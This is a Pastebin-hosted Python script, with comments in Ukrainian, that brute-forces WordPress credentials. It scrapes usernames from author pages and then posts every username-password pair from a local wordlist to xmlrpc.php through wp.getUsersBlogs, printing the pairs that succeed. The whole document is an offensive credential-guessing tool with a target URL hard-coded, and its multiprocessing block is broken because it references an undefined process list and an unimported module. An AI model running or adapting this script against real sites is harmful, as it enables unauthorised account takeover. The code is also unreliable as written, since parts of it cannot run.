Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import itertools
- import requests
- from multiprocessing import Pool
- from lxml import html
- # - - - - - - - - - - - Вхідні дані - - - - - - - - - - -
- XML = '''
- <?xml version="1.0" encoding="UTF-8"?>
- <methodCall>
- <methodName>wp.getUsersBlogs</methodName>
- <params>
- <param>
- <value>
- <string>{username}</string>
- </value>
- </param>
- <param>
- <value>
- <string>{password}</string>
- </value>
- </param>
- </params>
- </methodCall>
- '''
- TARGET_URL = 'http://192.168.1.6/xmlrpc.php'
- AUTHOR_URL = 'http://192.168.1.6/?author={id}'
- # - - - - - - - - - - - - - - - - - - - - - - - - - - -
- def wrap_creds_in_xml(username="", password=""):
- """З XML беремо username і password"""
- return XML.format(username=username, password=password)
- def is_correct(text=""):
- """Записуємо лише успішні моменти підбору пароля"""
- constant = 'Incorrect username or password'
- return constant not in text
- def get_usernames():
- """Парсимо користувачів по /?author={id}"""
- start_id = 1
- f = open('C:\\Users\\xStevex\\Desktop\\username.txt', 'w')
- while True:
- r = requests.get(AUTHOR_URL.format(id=start_id))
- tree = html.fromstring(r.content)
- title = tree.findtext('.//title')
- if "Page not found – user's Blog!" in title:
- f.close()
- break
- f.write(title.split()[0] + '\n')
- start_id += 1
- with open('C:\\Users\\xStevex\\Desktop\\username.txt') as file:
- text_as_string = file.read()
- return text_as_string.split()
- def get_passwords():
- """Підтягуємо паролі"""
- with open('C:\\Users\\xStevex\\Desktop\\passwords.txt') as file:
- text_as_string = file.read()
- return text_as_string.split('\n')
- def main():
- """Сам процес бруртфорсу"""
- users = get_usernames()
- passwords = get_passwords()
- for user, password in itertools.product(users, passwords):
- payload = wrap_creds_in_xml(username=user, password=password)
- response = requests.post(TARGET_URL, payload)
- correct = is_correct(text=response.text)
- if correct:
- print('[+] {}/{}'. format(user, password))
- else:
- print('[-] {}/{} '.format(user, password))
- # - - - - - - - - - - - MAIN - - - - - - - - - - -
- if __name__ == '__main__':
- p = multiprocessing.Process(main)
- processes.append(p)
- #starting all processes
- for i in processes:
- i.start()
- #if 1 process is dead kill others
- kill = False
- while(True):
- for i in processes:
- if i.is_alive() == False:
- kill = True
- if kill == True:
- for i in processes:
- i.terminate()
- break
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement